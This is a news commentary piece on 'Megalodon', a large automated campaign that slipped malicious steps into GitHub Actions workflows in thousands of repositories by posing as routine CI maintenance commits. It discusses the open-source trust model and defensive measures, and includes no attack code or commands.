A coordinated hacking campaign has poisoned over 5,700 GitHub repositories in just six hours, marking one of the most aggressive supply chain attacks on open source infrastructure to date. The operation, dubbed Megalodon, used sophisticated automation to inject malicious code into thousands of projects while masquerading as legitimate CI/CD maintenance.According to security researchers at SafeDep, the attackers used throwaway accounts with innocent-looking names like "build-bot," "auto-ci," "ci-bot," and "pipeline-bot." Their commit messages — "ci: add build optimization step" or "chore: optimize pipeline runtime" — were deliberately designed to blend into the background noise that developers encounter daily in continuous integration workflows.Here's what makes this attack genuinely concerning: it didn't exploit some zero-day vulnerability. It exploited trust. The malicious commits looked exactly like the automated maintenance updates that modern development workflows generate by the hundreds. For a developer reviewing pull requests, these would appear completely routine.The scale is what sets this apart from previous supply chain attacks. 5,561 repositories compromised in six hours suggests industrial-level automation. This wasn't a handful of researchers testing a proof-of-concept. This was a coordinated operation with infrastructure behind it.The technical method targeted CI workflow files — the YAML configurations that tell GitHub Actions what to do when code changes. By injecting malicious steps into these workflows, attackers could execute arbitrary code whenever the repository's automated builds ran. That code has access to secrets, deployment credentials, and the ability to poison release artifacts that downstream users would then install.What the press release doesn't say is often more important than what it does. We don't yet know what payload was delivered, who was targeted, or whether this was reconnaissance for a larger operation. The attackers' operational security appears strong — throwaway accounts, forged commit authors, plausible commit messages.This attack exposes a structural vulnerability in how we build software. Open source depends on trust — trust that contributors are who they claim to be, trust that CI systems are configured correctly, trust that repository maintainers will catch malicious changes. At the scale modern software operates, that trust model is breaking.The technology to detect this exists. Anomaly detection in commit patterns, verification of contributor identities, automated scanning of CI configuration changes. But most projects don't have the resources to implement these safeguards. The economics of open source mean that critical infrastructure often runs on volunteer labor and hope.The Wired investigation attributes this campaign to a group called TeamPCP, which has been conducting supply chain attacks at increasing scale. This isn't their first operation, but it's their largest.For developers, the lesson is clear: automated CI commits deserve the same scrutiny as any other code change. For the industry, it's a wake-up call that our development infrastructure needs security to be a first-class concern, not an afterthought. When attackers can compromise nearly 6,000 repositories in an afternoon, we're not dealing with individual security failures. We're dealing with systemic architectural risk.